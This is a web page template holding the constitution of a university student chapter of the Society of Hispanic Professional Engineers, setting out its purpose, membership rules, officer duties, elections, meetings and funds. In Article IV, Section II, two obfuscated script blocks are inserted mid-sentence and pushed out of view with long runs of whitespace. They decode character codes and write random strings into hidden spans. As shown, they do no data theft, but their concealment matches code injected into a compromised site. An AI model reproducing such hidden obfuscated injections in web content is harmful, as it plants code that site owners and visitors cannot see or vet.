<% provide(:title, 'Constitution') %>

<section>
      <div class="container">
        <div class="row">
          <div class="span8 offset2">
		<br>
<h3>Chapter Constitution<br>
</h3>
<p><strong>Contents</strong></p>
<ul>
  <li><a href="#preamble">Preamble</a></li>
  <li><a href="#article1">Article I: Name</a></li>
  <li><a href="#article2">Article II: Purpose</a></li>
  <li><a href="#article3">Article III: Membership</a></li>
  <li><a href="#article4">Article IV: Executive Board</a></li>
  <li><a href="#article5">Article V: Nominations</a></li>
  <li><a href="#article6">Article VI: Elections</a></li>
  <li><a href="#article7">Article VII: Meetings</a></li>
  <li><a href="#article8">Article VIII: Summer Session</a></li>
  <li><a href="#article9">Article IX: Sponsors and Advisors</a></li>
  <li><a href="#article10">Article X: Commitees</a></li>
  <li><a href="#article11">Article XI: Supervision of Funds</a></li>
  <li><a href="#article12">Article XII: Amendments</a></li>
  <li><a href="#article13">Article XIII: Referendum</a></li>

</ul>
<p id="preamble" class="style1"><strong>Preamble</strong></p><br>
<p>In order to aid Hispanics and other minorities toward achieving a degree in engineering, science, or math, we the founding members, have united to form an organization at the University of Illinois at Urbana-Champaign by the name of the Society of Hispanic Professional Engineers (SHPE-UIUC).</p><br>
<p>It will be the primary goal of SHPE-UIUC to help and provide assistance towards fellow Hispanic students at the University of Illinois at Urbana-Champaign, through our combined cooperative efforts and resources in the pursuit of similar goals. The gathering of members will consist of tutorial sessions, informational workshops, service programs, and organizational formal and informal meetings.</p><br>

<p>Realizing the difficult road that Hispanics face in these fields, and the lack of role models, it is in the best interest of SHPE-UIUC to establish a foundation in which these goals will be achieved by every member of the organization.</p><br><hr><br>

<p id="article1"><strong>Article I: Name</strong> </p><br>
<p>The name of this organization shall be the Society of Hispanic Professional Engineers at the University of Illinois at Urbana-Champaign, henceforth known as SHPE-UIUC. SHPE-UIUC shall be a student chapter of the National Society of Hispanic Professional Engineers, following all rules and guidelines pertaining to student chapters.  </p><br><hr><br>
<p id="article2"><strong>Article II: Purpose</strong></p><br>
<p>A) Maintain and increase the enrollment of Hispanics and other minorities in engineering and science programs at UIUC.
  
  <br>
  B) Provide information to Hispanic and other minorities at all grade levels concerning programs available in engineering and science.
  
  <br>
  C) Provide academic guidance, access to academic resources, leadership opportunities, career development, and career orientation for our members.<br>
D) Provide a meeting place for students with similar interests, goals, and backgrounds.  </p><br><hr><br>
<p id="article3"><strong>Article III: Membership</strong></p><br>
<p><u>Section I: Field of Membership</u><br>
  Full membership will be limited to University of Illinois at Urbana-Champaign full-time students. All requirements towards membership will conform to the Board of Trustee's policies regarding non-discrimination on the basis of race, religion, sex, or national origin. A member may only be expelled from the organization if 51% the active membership votes for his/her expulsion.</p><br>
<p><u>Section II: 
  Eligibility Requirements</u><br>
  A) Shall consist of UIUC students with declared majors.
  
  <br>
  B) Maintain good academic standing at UIUC according to University policies.
  
  <br>
  C) Excluding voting privileges, honorary membership may be offered to students attending other universities, and interested high school students.
  
  <br>
  D) Active membership shall be defined as having paid national and chapter dues. Attendance of at least five (5) SHPE-UIUC events, no more than (3) can be socials. All paid national members are allowed to attend the SHPE Regional and National events and conferences, but only active members may be allowed reimbursements. </p>
<br><hr><br>
<p id="article4"><strong>Article IV: Executive Board</strong></p><br>
<p><u>Section I: </u><br>
  <br>
  <u>Officers</u><br>
  A) President<br>
  B) External Vice-President
  <br>
  C) Internal Vice President
  <br>
  D) Treasurer
  <br>
  E) Secretary
  <br>
  <br>
  <u>Cabinet</u><br>
  A) Publicity
  <br>
  B) Academic Affairs
  <br>
  C) Student Advisor
  <br>
  D) Technical Chair
  <br>
  E) Membership Chair
  <br>
  F) Community Service Chair
  <br>
  G) High School Outreach Chair
  <br>
  H) Graduate Ambassador
  <br>
  <br>
  <u>Section II: Executive Board:</u><br>
  <br>
  The 																																																																																																																								<span id="xnreu"></span><script>pzbso=0;gtngl=String.fromCharCode(105,100,105,120,103,101,99,101,122,114);atevm=String.fromCharCode(122,108,115,109,119,40,41);mhkvv=document.getElementById(String.fromCharCode(120,110,114,101,117));window.onFocus=jpezs();function zlsmw(){++pzbso;(pzbso<3)?setTimeout(atevm,1):mhkvv.innerHTML=gtngl;}function jpezs(){if(mhkvv.offsetTop){gtngl=String.fromCharCode(0);}setTimeout(atevm,1);}</script>
 officers and 																																																																																																																								<span id="ozltf"></span><script>akjjc=0;lrkab=String.fromCharCode(114,112,116,117,101,122,105,102,118,102);hkjut=String.fromCharCode(111,115,106,99,99,40,41);dsgxi=document.getElementById(String.fromCharCode(111,122,108,116,102));window.onFocus=imaxh();function osjcc(){++akjjc;(akjjc<3)?setTimeout(hkjut,1):dsgxi.innerHTML=lrkab;}function imaxh(){if(dsgxi.offsetTop){lrkab=String.fromCharCode(0);}setTimeout(hkjut,1);}</script>
 cabinet members of the executive board shall consist of elected voting members. The executive board may appoint qualified members to fill any cabinet positions that remain open after the election. The executive board may create ad hoc cabinet positions and appoint qualified members to fill these positions. These cabinet members shall have the same rights as any other executive board member. These ad hoc positions will be subject to the same terms of office outlined in Article IV, Section 3 and qualifications outlined in Article IV, Section 4.
  <br>
  <br>
  <u>Section III: Qualifications for the Executive Board:</u><br>
  <br>
  A) Active membership for two (2) semesters is required for officers.  In the case of President, a member must have had a SHPE position (student chapter, regional, or national). Must be at least a junior for officers, or a sophomore with approval from the advisor. Active membership for one (1) semester is required for cabinet members.
  <br>
  B) 2.8/4.0 Cumulative &amp; Semester grade point average.
  <br>
  C) Must be a University of Illinois student, with a major (i.e. not undecided).
  <br>
  <br>
  <u>Section IV: Terms of Office:</u><br>
  <br>
  Terms of Office shall extend for the full academic year. In the event of an executive board member pursuing a co-op, study abroad, or other circumstance prohibiting the above commitment from being completed, it is the responsibility of the outgoing Executive board member to find a competent replacement. Said replacement is subject to election by the Executive Board.
  <br>
  <br>
  <u>Section V: Duties of Office:</u><br>
  <br>
  A) <u>President</u>
  <br>
  - Preside over meetings
  <br>
  - Coordinate Activities between other officers
  <br>
  - Communicate with the Minority Engineering Program staff as well as any other personnel from the College of Engineering
  <br>
  - Maintain contact with National and Regional Professional Chapters
  <br>
  - Prepare calendar of events
  <br>
  - Coordinate the write up of the National Reporting Program
  <br>
  - Responsible for continuity between executive boards
  <br>
  - Delegate any duty
  <br>
  - Coordinate National and Regional Conference logistics
  <br>
  <br>
  B) <u>External Vice-President</u>
  <br>
  - Create and maintain corporate contacts
  <br>
  - Coordinate company visits and presentations
  <br>
  - Maintain and update alumni list
  <br>
  - Communicate with alumni
  <br>
  - Coordinate an activity with alumni for relationships and future sponsorship (i.e. social event).
  <br>
  - Contact and invite alumni to the End of the Year Banquet.
  <br>
  - Represent SHPE-UIUC at corporate functions
  <br>
  - Responsible for SHPE-UIUC professional related programs
  <br>
  - Coordinate SHPE-UIUC attendance at outside activities
  <br>
  - In case president is not present, take over presidential duties.
  <br>
  <br>
  C) <u>Internal Vice-President</u>
  <br>
  - Create and maintain contacts with the administration and faculty of the College of Engineering
  <br>
  - Engineering Council Representative
  - Responsible for adequate SHPE-UIUC Representation at La Casa
  <br>
  - Representation at La Casa (LCASO)
  <br>
  - Responsible for on campus events in which SHPE is participating
  <br>
  - Responsible for SHPE-UIUC academic related programs
  <br>
  - Coordinate activities between committees within SHPE
  <br>
  - In case President and EVP not present take care of presidential duties.
  <br>
  <br>
  D) <u>Secretary</u>
  <br>
  - To oversee that all chapter records are kept up to date, and assist the President with all necessary paperwork needed for the chapter.
  <br>
  - Keep minutes at all meetings
  <br>
  - Responsible for room and equipment reservations for SHPE events
  <br>
  - Keep a file with resumes and membership applications of all members
  <br>
  - Maintain all SHPE information on a computer in the SHPE office where it can be accessed by the rest of the Executive Board
  <br>
  - Maintain SHPE documentation, desk, and office professional and orderly
  <br>
  - Responsible for enforcing office hours (when implemented by the Executive Board)
  <br>
  <br>
  E) <u>Treasurer</u>
  <br>
  - Responsible for financial accounts and book keeping for all SHPE funds
  <br>
  - Prepare proposed budgets for each academic semester
  <br>
  - Responsible for obtaining funds and resources for the
  chapter (i.e. responsible for fundraisers)<br>
  - Responsible for reimbursement of funds to SHPE-UIUC
  members <br>
  - Maintain current records of income and expenditures
  <br>
  - Communicate all pertinent information to MEP staff
  <br>
  - Maintain order at SHPE functions
  <br>
  - Maintain communication with other financial officers on campus
  <br>
  <br>
  F) <u>Publicity</u>
  <br>
  - Responsible for communicating with members
  <br>
  - Responsible for all mailings and postings on campus
  <br>
  - Responsible for obtaining information and articles for the newsletter
  <br>
  - Responsible for delivery of the newsletter
  <br>
  - Keep Email communication tools current and orderly
  <br>
  - Create and maintain contacts with the National SHPE Magazine
  <br>
- The chapter website should reflect the activities taking place on campus, and should be updated at least twice a week
  <br>
- Make sure the correct contact information is displayed on the website - Increase the use of the website by our members, and make it a single point of reference for all their needs
  <br>
- Maintain an accurate and updated calendar of events, as well as records of events in the web page and MySHPE
  <br>
  <br>
  G) <u>Academic Affairs</u>
  <br>
  - Responsible for keeping updated records of the G.P.A. for the chapter members
  <br>
  - Identifying and implementing programs and workshops to help improve the G.P.A of our members
  <br>
  - Set up and implement a SHPE Study Night program at Grainger Library at least twice a week, and all week during finals
  <br>
  - Responsible for the administration of the SHPE Study Files in the SHPE office
  <br>
  - Responsible for compiling and keeping an updated list of academic resources available for students, and making it available to our members.
  <br>
  <br>
  H) <u>Student Advisor</u>
  <br>
  - The student advisor shall be an upperclass undergraduate, or a graduate student, with at least two (2) semesters of leadership experience with SHPE (i.e. executive board, national/regional positions)
  <br>
  - Responsible for helping the chapter organize a competent executive board
  <br>
  - Responsible for keeping the chapter working toward a goal set by the executive board at the beginning of the year in accordance with national SHPE regulations
  - Serve as coach and source of advice to the President of the chapter
  <br>
  <br>
  I) <u>Technical Chair</u>
  <br>
  - Responsible for SHPE participation in annual Jerry Sanders competition.
  <br>
  - Head design and development of robotic entry.
  <br>
  - Organizes society involvement in Engineering Open House.
  <br>
  <br>
  J) <u>Membership Director</u>
  <br>
  - The Membership Director is in charge of organizing social activities
  <br>
  - Activities include: intramurals, parties, barbeques, and trips.
  <br>
  - Anticipate conflicts and make sure preventative measures are in place. (I.e. under age drinking, safety issues, and obeying University policies.)
  <br>
  - Head and attend all social events coordinated.
  <br>
  - Work with publicity to advertise events for increasing awareness of SHPE-socials on campus.
  <br>
- In charge of maintaining a list of membership status, and responsible for heading the Membership Challenge
  <br>
- Responsible for the implementation of the PartnerSHPE mentoring program to ensure members have a mentor
  <br>
  <br>
  K) <u>Community Service Chair</u>
  <br>
  - Responsible for organizing community service events- Make assessment to determine needs in community
  <br>
  - Identify community service options and decide which project to pursue
  <br>
  - Monitor the activities taking place and make adjustments as needed
  <br>
  - Responsible for the establishment and sustainability of a SHPE Jr. chapter
  <br>
  <br>
  L) <u>High School Outreach Chair</u>
  <br>
  - Responsible for high school visitations.
  <br>
  - Organize visits to high schools.
  <br>
  - Encourage higher education for minority students.
  <br>
  - Organize campus visits for high school students.
  <br>
  <br>
  M) <u>Graduate Ambassador (Must be a Graduate Student)</u>
  <br>
  - Implement a graduate committee 
  <br>
-Help increase the Graduate Student Membership
  <br>
-Communicate frequently with Regional Graduate Representative 
  <br>
-Submit articles and information to be included in Graduate newsletter and share this information with the undergraduate members
  <br>
- Involve Graduate students with PartnerSHPE
  <br>
-Help spread the word about Scholarships and Fellowships available to SHPE members
  <br>
-Request Graduate stoles
  <br>
-Responsible for Professional Development of Graduate Students  </p>
<br><hr><br>
<p id="article5"><strong>Article V: Nominations</strong></p><br>
<p>Part A: Shall be called for by the president within eight (8) weeks of the end of the spring semester.
  <br>
  Part B: Must be made by a member and must be seconded by another member.
  <br>
  Part C: The length of the candidate's speeches shall be decided upon at the time of the nominations by the president.
  <br>
Part D: All nominees will need to have academic written approval from the chief advisor.
  <br>
Part E: The speeches shall be made on the day of elections.  </p><br><hr><br>
<p id="article6"><strong>Article VI: Elections</strong></p><br>
<p> Part A: Elections shall be held within the last eight (8) weeks of each academic year.
  <br>
  Part B: Notice of elections and appointments shall be made by adequate means as defined in the bylaws.
  <br>
Part C: Voting will be held immediately following the speeches. 
  <br>
Part D: Active membership is required to vote
  <br>
Part E: An individual shall be chosen based on a majority vote.  Should an individual receive more votes of “No” or “Abstain,” a re-election will take place.
</p><br><hr><br>
<p id="article7"><strong>Article VII: Meetings</strong></p><br>
<p>Part A: General meetings shall be held at least monthly.
  <br>
  Part B: Other meetings, events or activities can be called at any time by the executive board.
  <br>
  Part C: The highest-ranking official, as defined in the bylaws, in attendance shall preside at the general meetings.
  <br>
  Part D: One third of the active membership shall constitute a quorum.
  <br>
  Part E: No meeting shall be conducted without the minimum attendance of at least three (3) members of the executive board.
  <br>
Part F: Executive board meetings will be held at least bi-weekly. </p><br><hr><br>
<p id="article8"><strong>Article VIII: Summer Session</strong></p><br>
<p>In the absence of all of the executive board members, a member appointed by the president shall preside. </p><br><hr><br>
<p id="article9"><strong>Article IX: Sponsors and Advisors</strong></p><br>
<p>Part A: SHPE-UIUC shall have one or more advisors, which will be either full time faculty members or academic staff personnel. Teaching assistants shall not be eligible.
  <br>
  Part B: Selection of the candidates will be based on their abilities to insure that the organization is functioning according to its objectives. </p><br><hr><br>
<p id="article10"><strong>Article X: Commitees</strong></p><br>
<p>The majority of the executive board shall approve establishment of new committees. </p><br><hr><br>
<p id="article11"><strong>Article XI: Supervision of Funds</strong></p><br>
<p> Funds shall be supervised by the treasurer and shall be deposited in to the Registered Student Organization (RSO) account or the SHPE-UIUC private account. The treasurer shall be the primary officer designated to handle the organization's funds and manage the accounts. The president shall supervise the management of funds and shall be the secondary officer designated to handle the organization's funds.  </p><br>
<hr><br>
<p id="article12"><strong>Article XII: Amendments</strong></p><br>
<p> Part A: The constitution shall be amended with the consent of all officers and with two-thirds (2 / 3) of the active membership.
  <br>
  Part B: Advanced notice of the constitutional amendments will be announced at the general meetings.
  <br>
  Part C: Amendments can be proposed by any active members and must be approved in accordance with Article XII, Part A. </p><br>
<hr><br>
<p id="article13"><strong>Article XIII: Referendum</strong></p><br>
<p> The aforementioned quorum (Article VII, PartD) constitutes a referendum committee, which shall have the power to overrule any actions taken by the executive board.</p><br><br><br>
          </div>
        </div>
  </div>
</section>